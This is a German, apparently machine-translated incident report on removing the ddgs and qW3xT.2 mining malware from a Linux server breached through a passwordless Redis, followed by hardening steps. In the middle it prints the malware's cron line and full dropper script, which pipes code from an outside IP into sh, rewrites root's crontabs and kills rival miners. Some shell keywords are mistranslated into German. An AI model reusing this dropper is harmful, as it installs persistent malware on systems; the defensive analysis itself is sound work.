Ein praktischer Bericht über den Umgang mit den in Linux-Servern implantierten Mining-Viren ddgs und qW3xT.2

Vorwort

Angesichts der verrückten Spekulationen um virtuelle Währungen sind Mining-Viren zu einer der am häufigsten von Kriminellen genutzten Angriffsmethoden geworden. Virenverbreiter können PCs oder Server zum Mining verwenden. Die spezifischen Phänomene sind eine hohe CPU-Auslastung des Computers, ein plötzlicher Rückgang des verfügbaren Speicherplatzes auf dem Laufwerk C, eine erhöhte Computertemperatur, ein erhöhtes Lüftergeräusch und andere Probleme.

In diesem Artikel werden hauptsächlich die Behandlungsmethoden für die in Linux implantierten Mining-Viren DDGS und qW3xT.2 vorgestellt. Werfen wir einen Blick auf die ausführliche Einführung.

Phänomen nach der Invasion:

Es wurden zwei abnormale Prozesse gefunden, qW3xT.2 und ddgs. Sie verbrauchten viel CPU und tauchten nach ihrer Beendigung eine Weile später wieder auf.

Nach dem Beenden dieser beiden abnormalen Prozesse wurden nach einiger Zeit die folgenden Prozesse beobachtet:

Zuerst konnte die geplante Aufgabe in /etc/sysconfig/crotnab das geplante Skript nicht finden und gab crontab -e ein, um die geplante Aufgabe zu finden.

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

<span style="font-size: 15px;">Ich habe überprüft, dass 149.56.106.215 in den Vereinigten Staaten liegt, und der Inhalt des i.sh-Skripts lautet wie folgt:</span>

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
wenn [ ! -f "/tmp/ddgs.3013" ]; dann
 wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | beenden
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | beenden

Behandlungsmethode:

1. Löschen Sie crontab -e

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2. Löschen Sie den von Hackern in /root/.ssh/authorized_keys festgelegten passwortfreien Anmeldeinhalt

3. Ändern Sie das Redis-Passwort

4. Ändern Sie die Passwörter des Root- und Login-Kontos

Sicherheitstipps:

1. Konfigurieren Sie die Bindungsoption, um die IP-Adresse zu begrenzen, die eine Verbindung zum Redis-Server herstellen kann, ändern Sie den Standardport 6379 von Redis, konfigurieren Sie die Authentifizierung, d. h. AUTH, und legen Sie das Kennwort fest. Das Kennwort wird im Klartext in der Redis-Konfigurationsdatei gespeichert

2. Konfigurieren Sie das Konfigurationselement "RENAME_CONFIG" des Umbenennungsbefehls, sodass es für Angreifer schwieriger ist, den Konfigurationsbefehl zu verwenden, selbst wenn ein nicht autorisierter Zugriff vorliegt

3. Wenn Sie das externe Redis-Netzwerk in der Firewall blockieren können

Einbruchsmethode:

Nachdem wir relevante Informationen gesammelt hatten, stellten wir fest, dass der Hacker aufgrund der Ausnutzung einer Redis-Sicherheitslücke eingedrungen war, kein Passwort festgelegt war oder das Passwort zu einfach war. Für spezifische Methoden siehe

https://www.jb51.net/article/147375.htm

Die Methode zur Änderung des Reids-Passworts ist wie folgt:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ## Aktuelles Passwort abrufen config set requirepass "IhrPasswort" ## Aktuelles Passwort festlegen. Nach dem Neustart des Dienstes wird es auf die Standardeinstellung zurückgesetzt, d. h. kein Passwort.

Um es dauerhaft zu machen, öffnen Sie die Redis-Konfigurationsdatei redis.conf, suchen Sie den requirepass-Wert und ändern Sie das Passwort wie folgt:

requirepass yourpassword ##Beachten Sie, dass vor der Zeile keine Leerzeichen stehen dürfen

Zusammenfassen

Das Obige ist der vollständige Inhalt dieses Artikels. Ich hoffe, dass der Inhalt dieses Artikels einen gewissen Lernwert für Ihr Studium oder Ihre Arbeit hat. Wenn Sie Fragen haben, können Sie eine Nachricht hinterlassen. Vielen Dank für Ihre Unterstützung von 123WORDPRESS.COM.